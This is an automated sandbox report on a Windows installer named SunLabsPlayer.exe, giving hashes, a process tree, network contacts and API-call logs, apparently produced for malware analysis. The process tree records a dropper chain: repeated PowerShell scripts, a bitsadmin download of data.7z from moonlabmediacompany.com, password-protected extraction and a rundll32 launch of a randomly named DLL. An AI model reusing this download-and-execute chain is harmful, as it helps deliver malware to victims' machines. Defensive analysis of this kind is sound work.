Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 18, 2021, 10:05 a.m.	May 18, 2021, 10:07 a.m.

Size	12.5MB
Type	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
MD5	`8639e05b36f6a6ecbc33e819d3654daa`
SHA256	`dfba9b09d2cb88a9d354bf16b154b9e9b9a221daa3e4a8805375439bed46c263`
CRC32	`59C94C81`
ssdeep	`393216:dOOavDWqfFPmx/BxEjnwQVNrZ03xfs9FXHu4u+4+:kXvSqfREERAhfsFXHXrj`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

SunLabsPlayer.exe "C:\Users\test22\AppData\Local\Temp\SunLabsPlayer.exe"
1108
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1976
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2300
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1788
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2740
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2680
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2092
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2488
- bitsadmin.exe "bitsadmin" /Transfer helper http://moonlabmediacompany.com/data/data.7z C:\zip.7z
  872
- data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZerFyxswOU1kSPo -y x C:\zip.7z -o"C:\Program Files\temp_files\"
  732
- data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pi9YcQvhaRhVM6Jx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
  2608
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2892
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2420
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  3068
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  3064
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1332
- rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
  772
  - rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
    1868
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1896
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1888
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2708
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1308
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
moonlabmediacompany.com	A 89.221.213.3	89.221.213.3

IP Address	Status	Action
164.124.101.2	Active	Moloch
89.221.213.3	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 93 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:05 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2021, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2021, 10:07 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (16 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 18, 2021, 10:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:05 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0
IsDebuggerPresent May 18, 2021, 10:07 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 606 events)

Time & API	Arguments	Status	Return
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006224b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00622cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00738890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00739150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00739150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00739150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007388d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007388d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007388d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007388d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007388d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2021, 10:05 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007388d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 18, 2021, 10:05 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

Performs some HTTP requests (2 events)

request	HEAD http://moonlabmediacompany.com/data/data.7z
request	GET http://moonlabmediacompany.com/data/data.7z

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1983 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1108 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e5c7000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72401000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72402000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02613000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02614000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02616000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
